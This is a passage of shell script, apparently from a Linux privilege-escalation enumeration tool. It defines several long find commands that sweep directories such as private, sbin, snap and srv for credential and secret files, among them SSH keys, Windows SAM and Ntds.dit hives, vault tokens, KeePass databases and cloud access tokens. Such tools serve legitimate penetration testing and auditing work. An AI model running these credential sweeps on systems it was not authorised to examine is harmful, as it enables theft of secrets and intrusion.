\"redis.conf\" -o -name \"ddclient.conf\" -o -name \"fat.config\" -o -name
\"ipsec.conf\" -o -name \"sssd.conf\" -o -name \"sysprep.inf\" -o -name
\"*config*.php\" -o -name \"default.sav\" -o -name \"id_dsa*\" -o -name
\"index.dat\" -o -name \".wgetrc\" -o -name \"access_tokens.json\" -o -name
\"security.sav\" -o -name \"*vnc*.xml\" -o -name \"software.sav\" -o -name
\".roadtools_auth\" -o -name \"supervisord.conf\" -o -name \"ftp.config\" -o
-name \"credentials.xml\" -o -name \"rsyncd.conf\" -o -name
\"docker-compose.yml\" -o -name \"master.key\" -o -name \"*.keystore\" -o -name
\"glusterfs.pem\" -o -name \"rsyncd.secrets\" -o -name \".rhosts\" -o -name
\"autologin.conf\" -o -name \"api_key\" -o -name \"KeePass.config*\" -o -name
\"*.keyring\" -o -name \".secrets.mkey\" -o -name \"*.service\" -o -name
\"zabbix_server.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o
-name \".bashrc\" -o -name \"pwd.ibd\" -o -name \"id_rsa*\" -o -name
\"sentry.conf.py\" -o -name \".erlang.cookie\" -o -name \"*.p12\" -o -name
\"NetSetup.log\" -o -name \"azureProfile.json\" -o -name \"rpcd\" -o -name
\"vsftpd.conf\" -o -name \"authorized_keys\" -o -name \"Elastix.conf\" -o -name
\"software\" -o -name \"*.csr\" -o -name \"plum.sqlite\" -o -name
\"frakti.sock\" -o -name \"*.pgp\" -o -name \"creds*\" -o -name \"groups.xml\"
2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_PRIVATE=`eval_bckgrd "find ${ROOT_FOLDER}private -name \"*.sqlite\" -o
-name \"*.gnupg\" -o -name \"*.sqlite3\" -o -name \"SYSTEM\" -o -name
\"gvm-tools.conf\" -o -name \"docker.socket\" -o -name \"config.xml\" -o -name
\"sip.conf\" -o -name \"scclient.exe\" -o -name \"*.ovpn\" -o -name
\"anaconda-ks.cfg\" -o -name \".env*\" -o -name \"KeePass.ini\" -o -name
\"passbolt.php\" -o -name \"AppEvent.Evt\" -o -name \"FreeSSHDservice.ini\" -o
-name \"*.db\" -o -name \"server.xml\" -o -name \"bitcoin.conf\" -o -name
\"SecEvent.Evt\" -o -name \"*.vhdx\" -o -name \"hostapd.conf\" -o -name
\"cesi.conf\" -o -name \"https.conf\" -o -name \"sitemanager.xml\" -o -name
\"*.vhd\" -o -name \"backup\" -o -name \"php.ini\" -o -name \".htpasswd\" -o
-name \"RDCMan.settings\" -o -name \"*.jks\" -o -name \".flyrc\" -o -name
\"*password*\" -o -name \"*vnc*.ini\" -o -name \"legacy_credentials.db\" -o
-name \"SAM\" -o -name \"containerd.sock\" -o -name \"krb5cc_*\" -o -name
\"https-xampp.conf\" -o -name \"*vnc*.txt\" -o -name \"psk.txt\" -o -name
\"winscp.ini\" -o -name \"jetty-realm.properties\" -o -name \"*.rdg\" -o -name
\"kadm5.acl\" -o -name \"datasources.xml\" -o -name \"*credential*\" -o -name
\"hudson.util.Secret\" -o -name \"*.tf\" -o -name \"glusterfs.key\" -o -name
\"sysprep.xml\" -o -name \"*.psk\" -o -name \"fastcgi_params\" -o -name
\"ws_ftp.ini\" -o -name \"cloud.cfg\" -o -name \"*.socket\" -o -name
\"grafana.ini\" -o -name \"authorized_hosts\" -o -name \"airflow.cfg\" -o -name
\"settings.php\" -o -name \"access_tokens.db\" -o -name \"*_history*\" -o -name
\"*.key\" -o -name \"mariadb.cnf\" -o -name \"passwd\" -o -name \".Xauthority\"
-o -name \"pagefile.sys\" -o -name \"mysqld.cnf\" -o -name \"mongod*.conf\" -o
-name \"glusterfs.ca\" -o -name \"secrets.yml\" -o -name \"*.cer\" -o -name
\"*.keytab\" -o -name \".boto\" -o -name \"bash.exe\" -o -name \"docker.sock\"
-o -name \"filezilla.xml\" -o -name \"error.log\" -o -name \"sess_*\" -o -name
\"tomcat-users.xml\" -o -name \"*.pfx\" -o -name \"atlantis.db\" -o -name
\"vault-ssh-helper.hcl\" -o -name \"*.ftpconfig\" -o -name \".credentials.json\"
-o -name \"kibana.y*ml\" -o -name \"gitlab.yml\" -o -name \"pgadmin*.db\" -o
-name \"scheduledtasks.xml\" -o -name \"httpd.conf\" -o -name \"pg_hba.conf\" -o
-name \"pgadmin4.db\" -o -name \"system.sav\" -o -name \"000-default.conf\" -o
-name \"*.swp\" -o -name \"appcmd.exe\" -o -name \"*.der\" -o -name
\"log4j-core*.jar\" -o -name \".lesshst\" -o -name \"unattended.xml\" -o -name
\"Dockerfile\" -o -name \"rocketchat.service\" -o -name \"*.pem\" -o -name
\".git\" -o -name \"autounattend.xml\" -o -name \".git-credentials\" -o -name
\"printers.xml\" -o -name \"webserver_config.py\" -o -name
\".recently-used.xbel\" -o -name \"snyk.json\" -o -name \"setupinfo\" -o -name
\"mosquitto.conf\" -o -name \"influxdb.conf\" -o -name \"rktlet.sock\" -o -name
\"secrets.ldb\" -o -name \"firebase-tools.json\" -o -name \".pypirc\" -o -name
\"amportal.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"wcx_ftp.ini\" -o
-name \"wsl.exe\" -o -name \".profile\" -o -name \"credentials.db\" -o -name
\"*.crt\" -o -name \".msmtprc\" -o -name \"my.ini\" -o -name \"dockershim.sock\"
-o -name \"*.tfstate\" -o -name \".plan\" -o -name \"FreePBX.conf\" -o -name
\"nginx.conf\" -o -name \"db.php\" -o -name \"my.cnf\" -o -name \"ntuser.dat\"
-o -name \"unattend.xml\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o
-name \"config.php\" -o -name \"backups\" -o -name \".ldaprc\" -o -name
\"ConsoleHost_history.txt\" -o -name \"kcpassword\" -o -name \"ipsec.secrets\"
-o -name \"smb.conf\" -o -name \"autologin\" -o -name \"racoon.conf\" -o -name
\"accessTokens.json\" -o -name \"unattend.txt\" -o -name \"snmpd.conf\" -o -name
\"passwd.ibd\" -o -name \"gitlab.rm\" -o -name \"ffftp.ini\" -o -name \"*.vmdk\"
-o -name \"*.gpg\" -o -name \".google_authenticator\" -o -name
\"protecteduserkey.bin\" -o -name \"wp-config.php\" -o -name
\"elasticsearch.y*ml\" -o -name \".k5login\" -o -name \"access.log\" -o -name
\"recentservers.xml\" -o -name \"sites.ini\" -o -name \"password*.ibd\" -o -name
\"web*.config\" -o -name \"adc.json\" -o -name \"setupinfo.bak\" -o -name
\"database.php\" -o -name \".sudo_as_admin_successful\" -o -name
\"snyk.config.json\" -o -name \"*.timer\" -o -name \"AzureRMContext.json\" -o
-name \"debian.cnf\" -o -name \"postgresql.conf\" -o -name \"TokenCache.dat\" -o
-name \"pgsql.conf\" -o -name \"*.pub\" -o -name \".gitconfig\" -o -name
\"krb5.conf\" -o -name \"known_hosts\" -o -name \"*.kdbx\" -o -name
\".vault-token\" -o -name \"ftp.ini\" -o -name \"*.viminfo\" -o -name
\"hosts.equiv\" -o -name \"iis6.log\" -o -name \"drives.xml\" -o -name
\"crio.sock\" -o -name \"*vnc*.c*nf*\" -o -name \"unattend.inf\" -o -name
\"redis.conf\" -o -name \"ddclient.conf\" -o -name \"fat.config\" -o -name
\"ipsec.conf\" -o -name \"sssd.conf\" -o -name \"sysprep.inf\" -o -name
\"*config*.php\" -o -name \"default.sav\" -o -name \"id_dsa*\" -o -name
\"index.dat\" -o -name \".wgetrc\" -o -name \"access_tokens.json\" -o -name
\"security.sav\" -o -name \"*vnc*.xml\" -o -name \"software.sav\" -o -name
\".roadtools_auth\" -o -name \"supervisord.conf\" -o -name \"ftp.config\" -o
-name \"credentials.xml\" -o -name \"rsyncd.conf\" -o -name
\"docker-compose.yml\" -o -name \"master.key\" -o -name \"*.keystore\" -o -name
\"glusterfs.pem\" -o -name \"rsyncd.secrets\" -o -name \".rhosts\" -o -name
\"autologin.conf\" -o -name \"api_key\" -o -name \"KeePass.config*\" -o -name
\"*.keyring\" -o -name \".secrets.mkey\" -o -name \"*.service\" -o -name
\"zabbix_server.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o
-name \".bashrc\" -o -name \"pwd.ibd\" -o -name \"id_rsa*\" -o -name
\"sentry.conf.py\" -o -name \".erlang.cookie\" -o -name \"*.p12\" -o -name
\"NetSetup.log\" -o -name \"azureProfile.json\" -o -name \"rpcd\" -o -name
\"vsftpd.conf\" -o -name \"authorized_keys\" -o -name \"Elastix.conf\" -o -name
\"software\" -o -name \"*.csr\" -o -name \"plum.sqlite\" -o -name
\"frakti.sock\" -o -name \"*.pgp\" -o -name \"creds*\" -o -name \"groups.xml\"
2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_RUN=`eval_bckgrd
"find ${ROOT_FOLDER}run -name \"*.service\" -o -name \"*.socket\" -o -name
\"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_SBIN=`eval_bckgrd "find ${ROOT_FOLDER}sbin -name \"*.sqlite\" -o -name
\"*.gnupg\" -o -name \"*.sqlite3\" -o -name \"SYSTEM\" -o -name
\"gvm-tools.conf\" -o -name \"docker.socket\" -o -name \"config.xml\" -o -name
\"sip.conf\" -o -name \"scclient.exe\" -o -name \"*.ovpn\" -o -name
\"anaconda-ks.cfg\" -o -name \".env*\" -o -name \"KeePass.ini\" -o -name
\"passbolt.php\" -o -name \"AppEvent.Evt\" -o -name \"FreeSSHDservice.ini\" -o
-name \"*.db\" -o -name \"server.xml\" -o -name \"bitcoin.conf\" -o -name
\"SecEvent.Evt\" -o -name \"*.vhdx\" -o -name \"hostapd.conf\" -o -name
\"cesi.conf\" -o -name \"https.conf\" -o -name \"sitemanager.xml\" -o -name
\"*.vhd\" -o -name \"backup\" -o -name \"php.ini\" -o -name \".htpasswd\" -o
-name \"RDCMan.settings\" -o -name \"*.jks\" -o -name \".flyrc\" -o -name
\"*password*\" -o -name \"*vnc*.ini\" -o -name \"legacy_credentials.db\" -o
-name \"SAM\" -o -name \"containerd.sock\" -o -name \"krb5cc_*\" -o -name
\"https-xampp.conf\" -o -name \"*vnc*.txt\" -o -name \"psk.txt\" -o -name
\"winscp.ini\" -o -name \"jetty-realm.properties\" -o -name \"*.rdg\" -o -name
\"kadm5.acl\" -o -name \"datasources.xml\" -o -name \"*credential*\" -o -name
\"hudson.util.Secret\" -o -name \"*.tf\" -o -name \"glusterfs.key\" -o -name
\"sysprep.xml\" -o -name \"*.psk\" -o -name \"fastcgi_params\" -o -name
\"ws_ftp.ini\" -o -name \"cloud.cfg\" -o -name \"*.socket\" -o -name
\"grafana.ini\" -o -name \"authorized_hosts\" -o -name \"airflow.cfg\" -o -name
\"settings.php\" -o -name \"access_tokens.db\" -o -name \"*_history*\" -o -name
\"*.key\" -o -name \"mariadb.cnf\" -o -name \"passwd\" -o -name \".Xauthority\"
-o -name \"pagefile.sys\" -o -name \"mysqld.cnf\" -o -name \"mongod*.conf\" -o
-name \"glusterfs.ca\" -o -name \"secrets.yml\" -o -name \"*.cer\" -o -name
\"*.keytab\" -o -name \".boto\" -o -name \"bash.exe\" -o -name \"docker.sock\"
-o -name \"filezilla.xml\" -o -name \"error.log\" -o -name \"tomcat-users.xml\"
-o -name \"*.pfx\" -o -name \"atlantis.db\" -o -name \"vault-ssh-helper.hcl\" -o
-name \"*.ftpconfig\" -o -name \".credentials.json\" -o -name \"kibana.y*ml\" -o
-name \"gitlab.yml\" -o -name \"pgadmin*.db\" -o -name \"scheduledtasks.xml\" -o
-name \"httpd.conf\" -o -name \"pg_hba.conf\" -o -name \"pgadmin4.db\" -o -name
\"system.sav\" -o -name \"000-default.conf\" -o -name \"*.swp\" -o -name
\"appcmd.exe\" -o -name \"*.der\" -o -name \"log4j-core*.jar\" -o -name
\".lesshst\" -o -name \"unattended.xml\" -o -name \"Dockerfile\" -o -name
\"rocketchat.service\" -o -name \"*.pem\" -o -name \".git\" -o -name
\"autounattend.xml\" -o -name \".git-credentials\" -o -name \"printers.xml\" -o
-name \"webserver_config.py\" -o -name \".recently-used.xbel\" -o -name
\"snyk.json\" -o -name \"setupinfo\" -o -name \"mosquitto.conf\" -o -name
\"influxdb.conf\" -o -name \"rktlet.sock\" -o -name \"secrets.ldb\" -o -name
\"firebase-tools.json\" -o -name \".pypirc\" -o -name \"amportal.conf\" -o -name
\"zabbix_agentd.conf\" -o -name \"wcx_ftp.ini\" -o -name \"wsl.exe\" -o -name
\".profile\" -o -name \"credentials.db\" -o -name \"*.crt\" -o -name
\".msmtprc\" -o -name \"my.ini\" -o -name \"dockershim.sock\" -o -name
\"*.tfstate\" -o -name \".plan\" -o -name \"FreePBX.conf\" -o -name
\"nginx.conf\" -o -name \"db.php\" -o -name \"my.cnf\" -o -name \"ntuser.dat\"
-o -name \"unattend.xml\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o
-name \"config.php\" -o -name \"backups\" -o -name \".ldaprc\" -o -name
\"ConsoleHost_history.txt\" -o -name \"kcpassword\" -o -name \"ipsec.secrets\"
-o -name \"smb.conf\" -o -name \"autologin\" -o -name \"racoon.conf\" -o -name
\"accessTokens.json\" -o -name \"unattend.txt\" -o -name \"snmpd.conf\" -o -name
\"passwd.ibd\" -o -name \"gitlab.rm\" -o -name \"ffftp.ini\" -o -name \"*.vmdk\"
-o -name \"*.gpg\" -o -name \".google_authenticator\" -o -name
\"protecteduserkey.bin\" -o -name \"wp-config.php\" -o -name
\"elasticsearch.y*ml\" -o -name \".k5login\" -o -name \"access.log\" -o -name
\"recentservers.xml\" -o -name \"sites.ini\" -o -name \"password*.ibd\" -o -name
\"web*.config\" -o -name \"adc.json\" -o -name \"setupinfo.bak\" -o -name
\"database.php\" -o -name \".sudo_as_admin_successful\" -o -name
\"snyk.config.json\" -o -name \"*.timer\" -o -name \"AzureRMContext.json\" -o
-name \"debian.cnf\" -o -name \"postgresql.conf\" -o -name \"TokenCache.dat\" -o
-name \"pgsql.conf\" -o -name \"*.pub\" -o -name \".gitconfig\" -o -name
\"krb5.conf\" -o -name \"known_hosts\" -o -name \"*.kdbx\" -o -name
\".vault-token\" -o -name \"ftp.ini\" -o -name \"*.viminfo\" -o -name
\"hosts.equiv\" -o -name \"iis6.log\" -o -name \"drives.xml\" -o -name
\"crio.sock\" -o -name \"*vnc*.c*nf*\" -o -name \"unattend.inf\" -o -name
\"redis.conf\" -o -name \"ddclient.conf\" -o -name \"fat.config\" -o -name
\"ipsec.conf\" -o -name \"sssd.conf\" -o -name \"sysprep.inf\" -o -name
\"*config*.php\" -o -name \"default.sav\" -o -name \"id_dsa*\" -o -name
\"index.dat\" -o -name \".wgetrc\" -o -name \"access_tokens.json\" -o -name
\"security.sav\" -o -name \"*vnc*.xml\" -o -name \"software.sav\" -o -name
\".roadtools_auth\" -o -name \"supervisord.conf\" -o -name \"ftp.config\" -o
-name \"credentials.xml\" -o -name \"rsyncd.conf\" -o -name
\"docker-compose.yml\" -o -name \"master.key\" -o -name \"*.keystore\" -o -name
\"glusterfs.pem\" -o -name \"rsyncd.secrets\" -o -name \".rhosts\" -o -name
\"autologin.conf\" -o -name \"api_key\" -o -name \"KeePass.config*\" -o -name
\"*.keyring\" -o -name \".secrets.mkey\" -o -name \"*.service\" -o -name
\"zabbix_server.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o
-name \".bashrc\" -o -name \"pwd.ibd\" -o -name \"id_rsa*\" -o -name
\"sentry.conf.py\" -o -name \".erlang.cookie\" -o -name \"*.p12\" -o -name
\"NetSetup.log\" -o -name \"azureProfile.json\" -o -name \"rpcd\" -o -name
\"vsftpd.conf\" -o -name \"authorized_keys\" -o -name \"Elastix.conf\" -o -name
\"software\" -o -name \"*.csr\" -o -name \"plum.sqlite\" -o -name
\"frakti.sock\" -o -name \"*.pgp\" -o -name \"creds*\" -o -name \"groups.xml\"
2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_SNAP=`eval_bckgrd
"find ${ROOT_FOLDER}snap -name \"*.sqlite\" -o -name \"*.gnupg\" -o -name
\"*.sqlite3\" -o -name \"SYSTEM\" -o -name \"gvm-tools.conf\" -o -name
\"docker.socket\" -o -name \"config.xml\" -o -name \"sip.conf\" -o -name
\"scclient.exe\" -o -name \"*.ovpn\" -o -name \"anaconda-ks.cfg\" -o -name
\".env*\" -o -name \"KeePass.ini\" -o -name \"passbolt.php\" -o -name
\"AppEvent.Evt\" -o -name \"FreeSSHDservice.ini\" -o -name \"*.db\" -o -name
\"server.xml\" -o -name \"bitcoin.conf\" -o -name \"SecEvent.Evt\" -o -name
\"*.vhdx\" -o -name \"hostapd.conf\" -o -name \"cesi.conf\" -o -name
\"https.conf\" -o -name \"sitemanager.xml\" -o -name \"*.vhd\" -o -name
\"backup\" -o -name \"php.ini\" -o -name \".htpasswd\" -o -name
\"RDCMan.settings\" -o -name \"*.jks\" -o -name \".flyrc\" -o -name
\"*password*\" -o -name \"*vnc*.ini\" -o -name \"legacy_credentials.db\" -o
-name \"SAM\" -o -name \"containerd.sock\" -o -name \"krb5cc_*\" -o -name
\"https-xampp.conf\" -o -name \"*vnc*.txt\" -o -name \"psk.txt\" -o -name
\"winscp.ini\" -o -name \"jetty-realm.properties\" -o -name \"*.rdg\" -o -name
\"kadm5.acl\" -o -name \"datasources.xml\" -o -name \"*credential*\" -o -name
\"hudson.util.Secret\" -o -name \"*.tf\" -o -name \"glusterfs.key\" -o -name
\"sysprep.xml\" -o -name \"*.psk\" -o -name \"fastcgi_params\" -o -name
\"ws_ftp.ini\" -o -name \"cloud.cfg\" -o -name \"*.socket\" -o -name
\"grafana.ini\" -o -name \"authorized_hosts\" -o -name \"airflow.cfg\" -o -name
\"settings.php\" -o -name \"access_tokens.db\" -o -name \"*_history*\" -o -name
\"*.key\" -o -name \"mariadb.cnf\" -o -name \"passwd\" -o -name \".Xauthority\"
-o -name \"pagefile.sys\" -o -name \"mysqld.cnf\" -o -name \"mongod*.conf\" -o
-name \"glusterfs.ca\" -o -name \"secrets.yml\" -o -name \"*.cer\" -o -name
\"*.keytab\" -o -name \".boto\" -o -name \"bash.exe\" -o -name \"docker.sock\"
-o -name \"filezilla.xml\" -o -name \"error.log\" -o -name \"tomcat-users.xml\"
-o -name \"*.pfx\" -o -name \"atlantis.db\" -o -name \"vault-ssh-helper.hcl\" -o
-name \"*.ftpconfig\" -o -name \".credentials.json\" -o -name \"kibana.y*ml\" -o
-name \"gitlab.yml\" -o -name \"pgadmin*.db\" -o -name \"scheduledtasks.xml\" -o
-name \"httpd.conf\" -o -name \"pg_hba.conf\" -o -name \"pgadmin4.db\" -o -name
\"system.sav\" -o -name \"000-default.conf\" -o -name \"*.swp\" -o -name
\"appcmd.exe\" -o -name \"*.der\" -o -name \"log4j-core*.jar\" -o -name
\".lesshst\" -o -name \"unattended.xml\" -o -name \"Dockerfile\" -o -name
\"rocketchat.service\" -o -name \"*.pem\" -o -name \".git\" -o -name
\"autounattend.xml\" -o -name \".git-credentials\" -o -name \"printers.xml\" -o
-name \"webserver_config.py\" -o -name \".recently-used.xbel\" -o -name
\"snyk.json\" -o -name \"setupinfo\" -o -name \"mosquitto.conf\" -o -name
\"influxdb.conf\" -o -name \"rktlet.sock\" -o -name \"secrets.ldb\" -o -name
\"firebase-tools.json\" -o -name \".pypirc\" -o -name \"amportal.conf\" -o -name
\"zabbix_agentd.conf\" -o -name \"wcx_ftp.ini\" -o -name \"wsl.exe\" -o -name
\".profile\" -o -name \"credentials.db\" -o -name \"*.crt\" -o -name
\".msmtprc\" -o -name \"my.ini\" -o -name \"dockershim.sock\" -o -name
\"*.tfstate\" -o -name \".plan\" -o -name \"FreePBX.conf\" -o -name
\"nginx.conf\" -o -name \"db.php\" -o -name \"my.cnf\" -o -name \"ntuser.dat\"
-o -name \"unattend.xml\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o
-name \"config.php\" -o -name \"backups\" -o -name \".ldaprc\" -o -name
\"ConsoleHost_history.txt\" -o -name \"kcpassword\" -o -name \"ipsec.secrets\"
-o -name \"smb.conf\" -o -name \"autologin\" -o -name \"racoon.conf\" -o -name
\"accessTokens.json\" -o -name \"unattend.txt\" -o -name \"snmpd.conf\" -o -name
\"passwd.ibd\" -o -name \"gitlab.rm\" -o -name \"ffftp.ini\" -o -name \"*.vmdk\"
-o -name \"*.gpg\" -o -name \".google_authenticator\" -o -name
\"protecteduserkey.bin\" -o -name \"wp-config.php\" -o -name
\"elasticsearch.y*ml\" -o -name \".k5login\" -o -name \"access.log\" -o -name
\"recentservers.xml\" -o -name \"sites.ini\" -o -name \"password*.ibd\" -o -name
\"web*.config\" -o -name \"adc.json\" -o -name \"setupinfo.bak\" -o -name
\"database.php\" -o -name \".sudo_as_admin_successful\" -o -name
\"snyk.config.json\" -o -name \"*.timer\" -o -name \"AzureRMContext.json\" -o
-name \"debian.cnf\" -o -name \"postgresql.conf\" -o -name \"TokenCache.dat\" -o
-name \"pgsql.conf\" -o -name \"*.pub\" -o -name \".gitconfig\" -o -name
\"krb5.conf\" -o -name \"known_hosts\" -o -name \"*.kdbx\" -o -name
\".vault-token\" -o -name \"ftp.ini\" -o -name \"*.viminfo\" -o -name
\"hosts.equiv\" -o -name \"iis6.log\" -o -name \"drives.xml\" -o -name
\"crio.sock\" -o -name \"*vnc*.c*nf*\" -o -name \"unattend.inf\" -o -name
\"redis.conf\" -o -name \"ddclient.conf\" -o -name \"fat.config\" -o -name
\"ipsec.conf\" -o -name \"sssd.conf\" -o -name \"sysprep.inf\" -o -name
\"*config*.php\" -o -name \"default.sav\" -o -name \"id_dsa*\" -o -name
\"index.dat\" -o -name \".wgetrc\" -o -name \"access_tokens.json\" -o -name
\"security.sav\" -o -name \"*vnc*.xml\" -o -name \"software.sav\" -o -name
\".roadtools_auth\" -o -name \"supervisord.conf\" -o -name \"ftp.config\" -o
-name \"credentials.xml\" -o -name \"rsyncd.conf\" -o -name
\"docker-compose.yml\" -o -name \"master.key\" -o -name \"*.keystore\" -o -name
\"glusterfs.pem\" -o -name \"rsyncd.secrets\" -o -name \".rhosts\" -o -name
\"autologin.conf\" -o -name \"api_key\" -o -name \"KeePass.config*\" -o -name
\"*.keyring\" -o -name \".secrets.mkey\" -o -name \"*.service\" -o -name
\"zabbix_server.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o
-name \".bashrc\" -o -name \"pwd.ibd\" -o -name \"id_rsa*\" -o -name
\"sentry.conf.py\" -o -name \".erlang.cookie\" -o -name \"*.p12\" -o -name
\"NetSetup.log\" -o -name \"azureProfile.json\" -o -name \"rpcd\" -o -name
\"vsftpd.conf\" -o -name \"authorized_keys\" -o -name \"Elastix.conf\" -o -name
\"software\" -o -name \"*.csr\" -o -name \"plum.sqlite\" -o -name
\"frakti.sock\" -o -name \"*.pgp\" -o -name \"creds*\" -o -name \"groups.xml\"
2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_SRV=`eval_bckgrd
"find ${ROOT_FOLDER}srv -name \"*.sqlite\" -o -name \"*.gnupg\" -o -name
\"*.sqlite3\" -o -name \"SYSTEM\" -o -name \"gvm-tools.conf\" -o -name
\"docker.socket\" -o -name \"config.xml\" -o -name \"sip.conf\" -o -name
\"scclient.exe\" -o -name \"*.ovpn\" -o -name \"anaconda-ks.cfg\" -o -name
\".env*\" -o -name \"KeePass.ini\" -o -name \"passbolt.php\" -o -name
\"AppEvent.Evt\" -o -name \"FreeSSHDservice.ini\" -o -name \"*.db\" -o -name
\"server.xml\" -o -name \"bitcoin.conf\" -o -name \"SecEvent.Evt\" -o -name
\"*.vhdx\" -o -name \"hostapd.conf\" -o -name \"cesi.conf\" -o -name
\"https.conf\" -o -name \"sitemanager.xml\" -o -name \"*.vhd\" -o -name
\"backup\" -o -name \"php.ini\" -o -name \".htpasswd\" -o -name
\"RDCMan.settings\" -o -name \"*.jks\" -o -name \".flyrc\" -o -name
\"*password*\" -o -name \"*vnc*.ini\" -o -name \"legacy_credentials.db\" -o
-name \"SAM\" -o -name \"containerd.sock\" -o -name \"krb5cc_*\" -o -name
\"https-xampp.conf\" -o -name \"*vnc*.txt\" -o -name \"psk.txt\" -o -name
\"winscp.ini\" -o -name \"jetty-realm.properties\" -o -name \"*.rdg\" -o -name
\"kadm5.acl\" -o -name \"datasources.xml\" -o -name \"*credential*\" -o -name
\"hudson.util.Secret\" -o -name \"*.tf\" -o -name \"glusterfs.key\" -o -name
\"sysprep.xml\" -o -name \"*.psk\" -o -name \"fastcgi_params\" -o -name
\"ws_ftp.ini\" -o -name \"cloud.cfg\" -o -name \"*.socket\" -o -name
\"grafana.ini\" -o -name \"authorized_hosts\" -o -name \"airflow.cfg\" -o -name
\"settings.php\" -o -name \"access_tokens.db\" -o -name \"*_history*\" -o -name
\"*.key\" -o -name \"mariadb.cnf\" -o -name \"passwd\" -o -name \".Xauthority\"
-o -name \"pagefile.sys\" -o -name \"mysqld.cnf\" -o -name \"mongod*.conf\" -o
-name \"glusterfs.ca\" -o -name \"secrets.yml\" -o -name \"*.cer\" -o -name
\"*.keytab\" -o -name \".boto\" -o -name \"bash.exe\" -o -name \"docker.sock\"
-o -name \"filezilla.xml\" -o -name \"error.log\" -o -name \"tomcat-users.xml\"
-o -name \"*.pfx\" -o -name \"atlantis.db\" -o -name \"vault-ssh-helper.hcl\" -o
-name \"*.ftpconfig\" -o -name \".credentials.json\" -o -name \"kibana.y*ml\" -o
-name \"gitlab.yml\" -o -name \"pgadmin*.db\" -o -name \"scheduledtasks.xml\" -o
-name \"httpd.conf\" -o -name \"pg_hba.conf\" -o -name \"pgadmin4.db\" -o -name
\"system.sav\" -o -name \"000-default.conf\" -o -name \"*.swp\" -o -name
\"appcmd.exe\" -o -name \"*.der\" -o -name \"log4j-core*.jar\" -o -name
\".lesshst\" -o -name \"unattended.xml\" -o -name \"Dockerfile\" -o -name
\"rocketchat.service\" -o -name \"*.pem\" -o -name \".git\" -o -name
\"autounattend.xml\" -o -name \".git-credentials\" -o -name \"printers.xml\" -o
-name \"webserver_config.py\" -o -name \".recently-used.xbel\" -o -name
\"snyk.json\" -o -name \"setupinfo\" -o -name \"mosquitto.conf\" -o -name
\"influxdb.conf\" -o -name \"rktlet.sock\" -o -name \"secrets.ldb\" -o -name
\"firebase-tools.json\" -o -name \".pypirc\" -o -name \"amportal.conf\" -o -name
\"zabbix_agentd.conf\" -o -name \"wcx_ftp.ini\" -o -name \"wsl.exe\" -o -name
\".profile\" -o -name \"credentials.db\" -o -name \"*.crt\" -o -name
\".msmtprc\" -o -name \"my.ini\" -o -name \"dockershim.sock\" -o -name
\"*.tfstate\" -o -name \".plan\" -o -name \"FreePBX.conf\" -o -name
\"nginx.conf\" -o -name \"db.php\" -o -name \"my.cnf\" -o -name \"ntuser.dat\"
-o -name \"unattend.xml\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o
-name \"config.php\" -o -name \"backups\" -o -name \".ldaprc\" -o -name
\"ConsoleHost_history.txt\" -o -name \"kcpassword\" -o -name \"ipsec.secrets\"
-o -name \"smb.conf\" -o -name \"autologin\" -o -name \"racoon.conf\" -o -name
\"accessTokens.json\" -o -name \"unattend.txt\" -o -name \"snmpd.conf\" -o -name
\"passwd.ibd\" -o -name \"gitlab.rm\" -o -name \"ffftp.ini\" -o -name \"*.vmdk\"
-o -name \"*.gpg\" -o -name \".google_authenticator\" -o -name
\"protecteduserkey.bin\" -o -name \"wp-config.php\" -o -name
\"elasticsearch.y*ml\" -o -name \".k5login\" -o -name \"access.log\" -o -name
\"recentservers.xml\" -o -name \"sites.ini\" -o -name \"password*.ibd\" -o -name
\"web*.config\" -o -name \"adc.json\" -o -name \"setupinfo.bak\" -o -name
\"database.php\" -o -name \".sudo_as_admin_successful\" -o -name
\"snyk.config.json\" -o -name \"*.timer\" -o -name \"AzureRMContext.json\" -o
-name \"debian.cnf\" -o -name \"postgresql.conf\" -o -name \"TokenCache.dat\" -o
-name \"pgsql.conf\" -o -name \"*.pub\" -o -name \".gitconfig\" -o -name
\"krb5.conf\" -o -name \"known_hosts\" -o -name \"*.kdbx\" -o -name
\".vault-token\" -o -name \"ftp.ini\" -o -name \"*.viminfo\" -o -name
\"hosts.equiv\" -o -name \"iis6.log\" -o -name \"drives.xml\" -o -name
\"crio.sock\" -o -name \"*vnc*.c*nf*\" -o -name \"unattend.inf\" -o -name
\"redis.conf\" -o -name \"ddclient.conf\" -o -name \"fat.config\" -o -name
\"ipsec.conf\" -o -name \"sssd.conf\" -o -name \"sysprep.inf\" -o -name
\"*config*.php\" -o -name \"default.sav\" -o -name \"id_dsa*\" -o -name
\"index.dat\" -o -name \".wgetrc\" -o -name \"access_tokens.json\" -o -name
\"security.sav\" -o -name \"*vnc*.xml\" -o -name \"software.sav\" -o -name
\".roadtools_auth\" -o -name \"supervisord.conf\" -o -name \"ftp.config\" -o
-name \"credentials.xml\" -o -name \"rsyncd.conf\" -o -name
\"docker-compose.yml\" -o -name \"master.key\" -o -name \"*.keystore\" -o -name
\"glusterfs.pem\" -o -name \"rsyncd.secrets\" -o -name \".rhosts\" -o -name
\"autologin.conf\" -o -name \"api_key\" -o -name \"KeePass.config*\" -o -name
\"*.keyring\" -o -name \".secrets.mkey\" -o -name \"*.service\" -o -name
\"zabbix_server.conf\" -o -name \".github\" -o -name \"KeePass.enforced*\" -o
-name \".bashrc\" -o -name \"pwd.ibd\" -o -name \"id_rsa*\" -o -name
\"sentry.conf.py\" -o -name \".erlang.cookie\" -o -name \"*.p12\" -o -name
\"NetSetup.log\" -o -name \"azureProfile.json\" -o -name \"rpcd\" -o -name
\"vsftpd.conf\" -o -name \"authorized_keys\" -o -name \"Elastix.conf\" -o -name
\"software\" -o -name \"*.csr\" -o -name \"plum.sqlite\" -o -name
